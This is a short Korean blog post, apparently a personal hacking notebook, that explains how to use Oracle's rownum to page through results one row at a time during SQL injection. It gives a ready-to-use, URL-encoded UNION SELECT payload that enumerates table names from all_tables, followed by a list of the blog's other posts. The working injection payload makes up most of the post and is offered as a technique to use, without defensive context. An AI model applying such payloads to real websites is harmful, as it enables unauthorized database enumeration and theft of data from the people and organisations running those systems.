oracle sql injection with rownum
2011. 9. 1. 16:39
질의 결과를 하나씩 뿐이 볼 수 없을 때 mysql의 limit 처럼 rownum을 사용해서 원하는 데이터를 볼 수 있다.
select문으로 충분히 결과를 뽑아 놓고 다시 rownum으로 특정 값을 선택.
union+select+1,table_name,''+
from+(select+rownum AS rnum,table_name+from+
(select +table_name+from+all_tables+order+by+table_name)
+where+rownum <= 200)+
where+rnum=1--
'Sabzil' 카테고리의 다른 글
| SSDT & SSDT shadow restore (0) | 2014.02.12 |
|---|---|
| Optimus G Pro(F240) rooting (0) | 2013.07.12 |
| Linux Oracle GUI client (0) | 2013.05.15 |
| Ubuntu 12.10 에서 libboost1.48-all-dev 가 설치 되지 않을 때 (3) | 2013.02.14 |
| how to set debug environment for android (0) | 2012.09.14 |
| Shellcode site (0) | 2009.09.29 |
| hey JJAAPPPHH ~ (4) | 2009.08.17 |
| hey JaPH (1) | 2009.08.12 |
| 6회 kisa 해킹방어대회 6번 (0) | 2009.07.09 |
| ABI (Application Binary Interface) (0) | 2009.03.17 |